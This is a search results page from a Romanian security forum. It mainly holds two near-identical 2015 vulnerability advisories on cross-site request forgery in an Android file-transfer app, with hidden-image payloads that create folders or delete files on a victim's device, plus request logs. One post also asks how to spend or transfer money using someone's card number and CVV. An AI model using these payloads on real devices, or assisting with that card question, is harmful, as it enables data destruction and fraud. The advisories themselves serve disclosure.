Jump to content

Search the Community

Showing results for tags 'transfer'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 5 results

  1. NeonBlackGod

    BTC

    Detin 3000 VTA (3 BTC). Cumpara cineva ? (Accept doar transfer bancar).
  2. Document Title: =============== Wireless File Transfer Pro Android - CSRF Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1437 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1437 Common Vulnerability Scoring System: ==================================== 2.3 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple cross site request forgery web vulnerabilities in the Wireless File Transfer Pro v1.0.1 mobile android application. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Lextel Technology Product: Wireless File Transfer Pro - (Android) Web Application UI 5.9.5 - 1.0.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple cross site request forgery issues has been discovered in the Wireless File Transfer Pro 1.0.1 android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers without privileged application user account and with medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Create New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery web vulnerability in the create and delete function is estimated as medium. (CVSS 2.3) Credits & Authors: ================== Hadji Samir [s-dz@hotmail.fr] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  3. Document Title: =============== Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Creat, Delete) Release Date: ============= 2015-02-10 Product & Service Introduction: =============================== Wireless File Transfer Pro is the advanced version of Wireless File Transfer. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro ) Affected Product(s): ==================== Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1 Lextel Technology Exploitation Technique: ======================= Remote Severity Level: =============== Medium Request Method(s): [+] [GET] Vulnerable Module(s): [+] browse Vulnerable Parameter(s): [+] fileExplorer.html? Affected Module(s): [+] Index of Documents (http://localhost:8888) Technical Details & Description: ================================ cross site request forgery has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application. The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks. Proof of Concept (PoC): ======================= Creat New Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 4 <a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%"> Delete File, Folder <img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test""width="0" height="0" border="0"> --- PoC Session Logs [GET] (Execution) --- GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1 Host: 192.168.1.2:8888 User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard Connection: keep-alive HTTP/1.1 200 OK Cache-control: no-cache Content-length: 30 Reference: http://localhost:8888/ Security Risk: ============== The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Source
  4. Salut tuturor . Va intreb pe voi poate stiti mai bine, daca detin numarul de card, Cvv, data exipare , nume prenume de la un card Bancomat, pot cumpara online? Sau cel putin cum pot transfera banii? Va multumesc anticipat><
×
×
  • Create New...